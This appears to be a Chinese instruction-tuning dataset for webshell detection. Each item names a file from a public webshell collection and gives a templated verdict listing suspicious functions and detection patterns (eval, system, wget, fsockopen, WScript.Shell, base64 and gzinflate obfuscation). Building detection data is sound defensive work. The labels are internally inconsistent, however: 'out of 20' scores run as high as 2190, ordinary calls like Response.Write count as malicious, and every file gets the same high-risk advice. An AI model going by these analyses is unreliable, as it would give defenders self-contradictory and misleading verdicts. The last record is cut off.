{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"g00nv13.php\", \"文件类型\": \"php\", \"文件大小\": \"31801 bytes\", \"行数\": 730}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, exec(, eval(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget, urllib 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 278/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/g00nv13.php", "malicious_score": 278, "md5_hash": "35ad2533192fe8a1a76c3276140db820"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sql.php\", \"文件类型\": \"php\", \"文件大小\": \"82531 bytes\", \"行数\": 1746}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, create_function(, fputs(, fputs (, base64_decode( 发现混淆技术: base64_decode, pack\\s*\\(, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\( 恶意度评分: 272/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/sql.php", "malicious_score": 272, "md5_hash": "e500a18a70bd080615ae47a976b11d65"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Dive Shell 1.0 - Emperor Hacking Team.php\", \"文件类型\": \"php\", \"文件大小\": \"5512 bytes\", \"行数\": 187}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Dive Shell 1.0 - Emperor Hacking Team.php", "malicious_score": 48, "md5_hash": "1b5102bdc41a7bc439eea8f0010310a5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Ani-Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"87075 bytes\", \"行数\": 2482}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, file_get_contents(, $_GET[, fwrite(, fputs( 发现混淆技术: base64_decode, gzinflate 包含网络功能: fsockopen, socket_create 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 562/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Ani-Shell.php", "malicious_score": 562, "md5_hash": "889bfc9fbb8ee7832044fc575324d01a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c66.php\", \"文件类型\": \"php\", \"文件大小\": \"131592 bytes\", \"行数\": 2652}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 248/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c66.php", "malicious_score": 248, "md5_hash": "fa5e437ab61b4ad5d19fb01918af768b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat Shell v1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"8998 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Antichat Shell v1.3.php", "malicious_score": 48, "md5_hash": "40d0abceba125868be7f3f990f031521"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"remview_fix.php\", \"文件类型\": \"php\", \"文件大小\": \"88455 bytes\", \"行数\": 2553}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, system(, eval( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 65/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/remview_fix.php", "malicious_score": 65, "md5_hash": "f46edd55b4e880b42771e2bed353c7f1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php\", \"文件类型\": \"php\", \"文件大小\": \"161917 bytes\", \"行数\": 3168}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 273/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php", "malicious_score": 273, "md5_hash": "27786d1e0b1046a1a7f67ee41c64bf4c"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c37.php\", \"文件类型\": \"php\", \"文件大小\": \"174864 bytes\", \"行数\": 2151}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, str_rot13(, file_get_contents(, $_GET[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 2190/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c37.php", "malicious_score": 2190, "md5_hash": "d01144c04e7a46870a8dd823eb2fe5c8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"antichat.php\", \"文件类型\": \"php\", \"文件大小\": \"31792 bytes\", \"行数\": 872}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 307/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/antichat.php", "malicious_score": 307, "md5_hash": "f185aafde204755306ed4f8e020a2b28"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpshell.php\", \"文件类型\": \"php\", \"文件大小\": \"8686 bytes\", \"行数\": 259}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 恶意度评分: 57/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/phpshell.php", "malicious_score": 57, "md5_hash": "f8a6d5306fb37414c5c772315a27832f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.php\", \"文件类型\": \"php\", \"文件大小\": \"320 bytes\", \"行数\": 25}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/cmd.php", "malicious_score": 9, "md5_hash": "c38ae5ba61fd84f6bbbab98d89d8a346"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"G5.php\", \"文件类型\": \"php\", \"文件大小\": \"85665 bytes\", \"行数\": 1555}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_POST[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 838/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/G5.php", "malicious_score": 838, "md5_hash": "cf5bb9210594dc2ca5be46d387270aef"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jHn.php\", \"文件类型\": \"php\", \"文件大小\": \"63664 bytes\", \"行数\": 1265}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_POST[ 发现混淆技术: base64_decode, pack\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 824/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/jHn.php", "malicious_score": 824, "md5_hash": "40c6ecf77253e805ace85f119fe1cebb"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"metaslsoft.php\", \"文件类型\": \"php\", \"文件大小\": \"79452 bytes\", \"行数\": 1612}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 688/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/metaslsoft.php", "malicious_score": 688, "md5_hash": "aa328ed1476f4a10c0bcc2dde4461789"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"arabicspy.php\", \"文件类型\": \"php\", \"文件大小\": \"44116 bytes\", \"行数\": 1264}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 407/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/arabicspy.php", "malicious_score": 407, "md5_hash": "dc4228c87d09316f9eb7b183e93f0e05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a.php\", \"文件类型\": \"php\", \"文件大小\": \"5159 bytes\", \"行数\": 139}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, exec( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/a.php", "malicious_score": 6, "md5_hash": "e3b461f7464d81f5022419d87315a90d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso2.5.php\", \"文件类型\": \"php\", \"文件大小\": \"65950 bytes\", \"行数\": 1516}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, $_POST[, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 952/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/wso2.5.php", "malicious_score": 952, "md5_hash": "7c8e5d31aad28eb1f0a9a53145551e05"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99madshell.php\", \"文件类型\": \"php\", \"文件大小\": \"44342 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c99madshell.php", "malicious_score": 13, "md5_hash": "9e4b767e9c70b275f7e57e4314862883"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Safe mode breaker.php\", \"文件类型\": \"php\", \"文件大小\": \"2244 bytes\", \"行数\": 94}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Safe mode breaker.php", "malicious_score": 9, "md5_hash": "5bd07ccb1111950a5b47327946bfa194"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Worse Linux Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"2455 bytes\", \"行数\": 69}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Worse Linux Shell.php", "malicious_score": 18, "md5_hash": "8338c8d9eab10bd38a7116eb534b5fa2"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"404.php\", \"文件类型\": \"php\", \"文件大小\": \"72804 bytes\", \"行数\": 1487}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 731/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/404.php", "malicious_score": 731, "md5_hash": "078c55ac475ab9e028f94f879f548bca"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b37.php\", \"文件类型\": \"php\", \"文件大小\": \"31097 bytes\", \"行数\": 266}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/b37.php", "malicious_score": 15, "md5_hash": "0421445303cfd0ec6bc20b3846e30ff0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_PSych0.php\", \"文件类型\": \"php\", \"文件大小\": \"164114 bytes\", \"行数\": 3284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 320/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/c99_PSych0.php", "malicious_score": 320, "md5_hash": "32ab6ddc0a2f73789461e2a2390be53e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57142.php\", \"文件类型\": \"php\", \"文件大小\": \"57396 bytes\", \"行数\": 42}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, str_rot13 包含网络功能: wget 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/r57142.php", "malicious_score": 19, "md5_hash": "0911b6e6b8f4bcb05599b2885a7fe8a8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"acid.php\", \"文件类型\": \"php\", \"文件大小\": \"185422 bytes\", \"行数\": 3276}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, fputs( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 410/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/acid.php", "malicious_score": 410, "md5_hash": "b8f261a3cdf23398d573aaf55eaf63b5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cihshell_fix.php\", \"文件类型\": \"php\", \"文件大小\": \"46553 bytes\", \"行数\": 565}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, fwrite(, $_POST[, exec(, system( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 492/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/cihshell_fix.php", "malicious_score": 492, "md5_hash": "3823ac218032549b86ee7c26f10c4cb5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Macker's Private PHPShell.php\", \"文件类型\": \"php\", \"文件大小\": \"38230 bytes\", \"行数\": 2026}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, fwrite(, system(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/Macker's Private PHPShell.php", "malicious_score": 17, "md5_hash": "e24cbf0e294da9ac2117dc660d890bb9"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"h4ntu shell [powered by tsoi].php\", \"文件类型\": \"php\", \"文件大小\": \"2475 bytes\", \"行数\": 78}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system(, exec( 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/PHP/h4ntu shell [powered by tsoi].php", "malicious_score": 12, "md5_hash": "06ed0b2398f8096f1bebf092d0526137"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"up.asp\", \"文件类型\": \"asp\", \"文件大小\": \"4467 bytes\", \"行数\": 137}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/up.asp", "malicious_score": 14, "md5_hash": "f775e721cfe85019fe41c34f47c0d67c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"filesystembrowser.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"6170 bytes\", \"行数\": 189}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/filesystembrowser.aspx", "malicious_score": 48, "md5_hash": "43a1f7827d0a32ddbbc07b98f185487f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"elmaliseker.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63639 bytes\", \"行数\": 2324}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Wscript.Shell, CreateObject(, Request.form, request.form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 489/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/elmaliseker.asp", "malicious_score": 489, "md5_hash": "b32d1730d23a660fd6aa8e60c3dc549f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"tool.asp\", \"文件类型\": \"asp\", \"文件大小\": \"45568 bytes\", \"行数\": 792}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, CreateObject(, Createobject(, WSCRIPT.SHELL, Request.Form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 813/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/tool.asp", "malicious_score": 813, "md5_hash": "5e19db901a40defaeb29aaa184e2e612"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdexec.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"2542 bytes\", \"行数\": 82}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/cmdexec.aspx", "malicious_score": 18, "md5_hash": "175ea7afda37bf5c6113b2f108dc009b"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"RemExp.asp\", \"文件类型\": \"asp\", \"文件大小\": \"7445 bytes\", \"行数\": 250}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, CreateObject( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/RemExp.asp", "malicious_score": 54, "md5_hash": "851175ba9247b8f95050394abf166763"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zehir.asp\", \"文件类型\": \"asp\", \"文件大小\": \"44768 bytes\", \"行数\": 1193}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Response.write, CreateObject(, CreateObject ( 发现混淆技术: chr\\s*\\( 恶意度评分: 455/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/zehir.asp", "malicious_score": 455, "md5_hash": "381080b942d77cd813ceaa68b70eae4f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sql.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"2816 bytes\", \"行数\": 94}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/sql.aspx", "malicious_score": 6, "md5_hash": "9a2cb993b34e9229fdc8f8cc1601e81c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fileupload.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"3056 bytes\", \"行数\": 98}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/fileupload.aspx", "malicious_score": 36, "md5_hash": "394db338e2248f6c31682e76f882fd74"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1372 bytes\", \"行数\": 79}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/list.asp", "malicious_score": 30, "md5_hash": "1cfa493a165eb4b43e6d4cc0f2eab575"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zehir4.asp\", \"文件类型\": \"asp\", \"文件大小\": \"50216 bytes\", \"行数\": 1190}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Response.write, CreateObject(, CreateObject ( 发现混淆技术: chr\\s*\\( 恶意度评分: 455/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/zehir4.asp", "malicious_score": 455, "md5_hash": "685e7b88bde609dacfb3b702c61faaaa"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspydrv.asp\", \"文件类型\": \"asp\", \"文件大小\": \"34456 bytes\", \"行数\": 828}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Request.querystring, Request.QueryString, request.querystring 发现混淆技术: chr\\s*\\( 恶意度评分: 440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/aspydrv.asp", "malicious_score": 440, "md5_hash": "de0a58f7d1e200d0b2c801a94ebce330"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ntdaddy.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41788 bytes\", \"行数\": 1013}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/ntdaddy.asp", "malicious_score": 776, "md5_hash": "3c0e713347e5a86134f7349aa50234d9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": 